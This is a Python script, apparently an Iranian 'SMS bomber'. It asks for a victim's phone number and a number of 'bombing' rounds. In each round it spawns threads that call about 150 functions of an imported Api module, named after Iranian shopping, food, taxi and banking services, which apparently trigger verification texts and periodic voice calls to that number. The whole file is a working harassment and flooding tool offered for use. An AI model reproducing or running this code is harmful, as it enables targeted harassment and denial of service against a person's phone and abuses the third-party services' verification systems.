from threading import Thread
import Api
from time import sleep
from sys import exit
from os import system, name
from re import findall 

def printLow(Str):
    for char in Str:
        print(char, end='', flush=True)
        sleep(0.01)

def count_of_api():
    a = open("Api.py" , "r", encoding="utf-8").read()
    v = findall("def ([\d|\w]+)",a)
    return len(v)

def sms(phone , xx):
    phone = f"+98{phone[1::]}"
    count = 1
    while count <= xx:
        Thread(target=Api.snap, args=[phone]).start()
        Thread(target=Api.alinance, args=[phone]).start()
        Thread(target=Api.alopeyk, args=[phone]).start()
        Thread(target=Api.alopeyk_safir, args=[phone]).start()
        Thread(target=Api.chaymarket, args=[phone]).start()
        Thread(target=Api.balad, args=[phone]).start()        
        Thread(target=Api.coffefastfoodluxury, args=[phone]).start()
        Thread(target=Api.dadhesab, args=[phone]).start()
        Thread(target=Api.dosma, args=[phone]).start()    
        Thread(target=Api.ehteraman, args=[phone]).start()
        Thread(target=Api.flightio, args=[phone]).start()
        Thread(target=Api.foodcenter, args=[phone]).start()        
        Thread(target=Api.shop_mci, args=[phone]).start()
        Thread(target=Api.mci, args=[phone]).start()
        Thread(target=Api.hamrahbours, args=[phone]).start()
        Thread(target=Api.homtick, args=[phone]).start()
        Thread(target=Api.iranamlaak, args=[phone]).start()
        Thread(target=Api.karchidari, args=[phone]).start()        
        Thread(target=Api.kardoon, args=[phone]).start()
        Thread(target=Api.mazoo, args=[phone]).start()
        Thread(target=Api.ostadkr, args=[phone]).start()
        Thread(target=Api.paymishe, args=[phone]).start()
        Thread(target=Api.nesengrill, args=[phone]).start()
        Thread(target=Api.sizdah50, args=[phone]).start()
        Thread(target=Api.zerocafe, args=[phone]).start()
        Thread(target=Api.podro, args=[phone]).start()
        Thread(target=Api.rayshomar, args=[phone]).start()
        Thread(target=Api.refahtea, args=[phone]).start()
        Thread(target=Api.lendo, args=[phone]).start()
        Thread(target=Api.olgoo, args=[phone]).start()
        Thread(target=Api.melix, args=[phone]).start()
        Thread(target=Api.safiran, args=[phone]).start()
        Thread(target=Api.deyfriedchicken, args=[phone]).start()
        Thread(target=Api.donergarden, args=[phone]).start()
        Thread(target=Api.foodbell, args=[phone]).start()
        Thread(target=Api.foodiran16, args=[phone]).start()
        Thread(target=Api.foodlandkish, args=[phone]).start()
        Thread(target=Api.garcon, args=[phone]).start()
        Thread(target=Api.gelatohouse, args=[phone]).start()
        Thread(target=Api.ghasedak24, args=[phone]).start()
        Thread(target=Api.hiword, args=[phone]).start()
        Thread(target=Api.devslop, args=[phone]).start()
        Thread(target=Api.digikala, args=[phone]).start()
        Thread(target=Api.hyperjan, args=[phone]).start()
        Thread(target=Api.iranketab, args=[phone]).start()
        Thread(target=Api.ketabchi, args=[phone]).start()
        Thread(target=Api.abantether, args=[phone]).start()
        Thread(target=Api.bit24, args=[phone]).start()
        Thread(target=Api.dicardo, args=[phone]).start()
        Thread(target=Api.exo, args=[phone]).start()
        Thread(target=Api.shahrfarsh, args=[phone]).start()
        Thread(target=Api.tikban, args=[phone]).start()
        Thread(target=Api.digistyle, args=[phone]).start()
        Thread(target=Api.banankala, args=[phone]).start()
        Thread(target=Api.khanoumi, args=[phone]).start()
        Thread(target=Api.dastkhat, args=[phone]).start()
        Thread(target=Api.steelalborz, args=[phone]).start()
        Thread(target=Api.rojashop, args=[phone]).start()
        Thread(target=Api.dadpardaz, args=[phone]).start()
        Thread(target=Api.tapsi, args=[phone]).start()
        Thread(target=Api.offdecor, args=[phone]).start()
        Thread(target=Api.mashinbank, args=[phone]).start()
        Thread(target=Api.pezeshket, args=[phone]).start()
        Thread(target=Api.topnoor, args=[phone]).start()
        Thread(target=Api.arshiyan, args=[phone]).start()
        Thread(target=Api.timcheh, args=[phone]).start()
        Thread(target=Api.takfarsh, args=[phone]).start()
        Thread(target=Api.beheshticarpet, args=[phone]).start()
        Thread(target=Api.mobogift, args=[phone]).start()
        Thread(target=Api.iranicard, args=[phone]).start()
        Thread(target=Api.rokla, args=[phone]).start()
        Thread(target=Api.moshaveran724, args=[phone]).start()
        Thread(target=Api.pubgsell, args=[phone]).start()
        Thread(target=Api.khodro45, args=[phone]).start()
        Thread(target=Api.cinematicket, args=[phone]).start()
        Thread(target=Api.irantic, args=[phone]).start()
        Thread(target=Api.kafegheymat, args=[phone]).start()
        Thread(target=Api.helsa, args=[phone]).start()
        Thread(target=Api.virgool, args=[phone]).start()
        Thread(target=Api.paklean, args=[phone]).start()
        Thread(target=Api.alopeyk, args=[phone]).start()
        Thread(target=Api.tamland, args=[phone]).start()
        Thread(target=Api.opco, args=[phone]).start()
        Thread(target=Api.givernfood, args=[phone]).start()
        Thread(target=Api.mahiyekhoob, args=[phone]).start()
        Thread(target=Api.nesengrill, args=[phone]).start()
        Thread(target=Api.pirankalaco, args=[phone]).start()
        Thread(target=Api.pizzapanjereh, args=[phone]).start()
        Thread(target=Api.shandiz, args=[phone]).start()
        Thread(target=Api.tnovin, args=[phone]).start()        
        Thread(target=Api.tj8, args=[phone]).start()
        Thread(target=Api.mashinbank, args=[phone]).start()
        Thread(target=Api.digikalajet, args=[phone]).start()
        Thread(target=Api.express, args=[phone]).start()
        Thread(target=Api.delino, args=[phone]).start()
        Thread(target=Api.didnegar, args=[phone]).start()
        Thread(target=Api.pakhsh, args=[phone]).start()
        Thread(target=Api.baskol, args=[phone]).start()
        Thread(target=Api.basalam, args=[phone]).start()
        Thread(target=Api.shad, args=[phone]).start()
        Thread(target=Api.gap, args=[phone]).start()
        Thread(target=Api.tap30, args=[phone]).start()
        Thread(target=Api.emtiaz, args=[phone]).start()
        Thread(target=Api.divar, args=[phone]).start()
        Thread(target=Api.rubika, args=[phone]).start()
        Thread(target=Api.torob, args=[phone]).start()
        Thread(target=Api.bama, args=[phone]).start()
        Thread(target=Api.snapfood, args=[phone]).start()
        Thread(target=Api.sheypoor, args=[phone]).start()
        Thread(target=Api.alibaba, args=[phone]).start()
        Thread(target=Api.smarket, args=[phone]).start()
        Thread(target=Api.arka, args=[phone]).start()
        Thread(target=Api.sTrip, args=[phone]).start()
        Thread(target=Api.ragham_call, args=[phone]).start()
        Thread(target=Api.drdr, args=[phone]).start()
        Thread(target=Api.filmnet, args=[phone]).start()
        Thread(target=Api.bahram_shop, args=[phone]).start()
        Thread(target=Api.banimode, args=[phone]).start()
        Thread(target=Api.okcs, args=[phone]).start()
        Thread(target=Api.binjo, args=[phone]).start()
        Thread(target=Api.chamedoon, args=[phone]).start()
        Thread(target=Api.kilid, args=[phone]).start()
        Thread(target=Api.namava, args=[phone]).start()
        Thread(target=Api.pinket, args=[phone]).start()
        Thread(target=Api.otaghak, args=[phone]).start()
        Thread(target=Api.itoll, args=[phone]).start()
        Thread(target=Api.shab, args=[phone]).start()
        Thread(target=Api.pubisha, args=[phone]).start()
        Thread(target=Api.doctor, args=[phone]).start()
        Thread(target=Api.taghche, args=[phone]).start()
        Thread(target=Api.digipay, args=[phone]).start()
        Thread(target=Api.wis, args=[phone]).start()
        Thread(target=Api.doctoreto, args=[phone]).start()
        Thread(target=Api.a4baz, args=[phone]).start()
        Thread(target=Api.tmg, args=[phone]).start()
        Thread(target=Api.achar, args=[phone]).start()
        Thread(target=Api.okorosh, args=[phone]).start()
        Thread(target=Api.anar, args=[phone]).start()
        Thread(target=Api.gapfilm, args=[phone]).start()
        Thread(target=Api.azki, args=[phone]).start()
        Thread(target=Api.nobat, args=[phone]).start()
        Thread(target=Api.see5, args=[phone]).start()
        Thread(target=Api.ghabzino, args=[phone]).start()
        Thread(target=Api.simkhanF, args=[phone]).start()
        Thread(target=Api.simkhanT, args=[phone]).start()
        Thread(target=Api.drsaina, args=[phone]).start()
        Thread(target=Api.limome, args=[phone]).start()
        Thread(target=Api.bimito, args=[phone]).start()
        Thread(target=Api.bimitoVip, args=[phone]).start()
        Thread(target=Api.seebirani, args=[phone]).start()
        Thread(target=Api.mihanpezeshk, args=[phone]).start()
        Thread(target=Api.mek, args=[phone]).start()
        Thread(target=Api.hamlex, args=[phone]).start()
        Thread(target=Api.irwco, args=[phone]).start()
        Thread(target=Api.snapp_link, args=[phone]).start()
        Thread(target=Api.sibbank, args=[phone]).start()
        Thread(target=Api.miare, args=[phone]).start()
        Thread(target=Api.shahrhayejadid, args=[phone]).start()
        print(f"\033[1m\033[96mRound \033[1;31m{count} \033[1m\033[96mCompleted")
        if (count % 5) == 0:
           Thread(target=Api.paklean_call, args=[phone]).start()
        count += 1
        sleep(0.3)
    printLow(f"\033[32;1m[\033[1;33mFinished\033[32;1m]")
    exit()


if __name__ == "__main__":
    printLow(f"""\033[32;1m[+] \033[1;33mCount Of Api's: \033[32;1m{count_of_api()}\n\033[32;1m[+] \033[1;33mDeveloper: \033[32;1m@Dev_Moon""")
    num = input(f'\n\n\033[32;1m[$] \033[1m\033[96mEnter Phone Number\n\033[1;33m  Ex:09190000000\n \033[1;31m-> \033[32;1m')
    yy = int(input("\n\033[32;1m[$] \033[1;33mEnter The Count of Round of Bombing\n\033[1;31m-> \033[32;1m"))
    system('clear' if name == 'posix' else 'cls')
    printLow("\033[32;1m[+]\033[1;33m Phone Number:\033[1m\033[96m {}\n\033[32;1m[+]\033[1;33m Rounds:\033[1m\033[96m {}\n\n".format(num,yy))
    printLow(f"\033[32;1m[\033[1;31mStart\033[32;1m]\n")
    sms(phone=num,xx=yy)
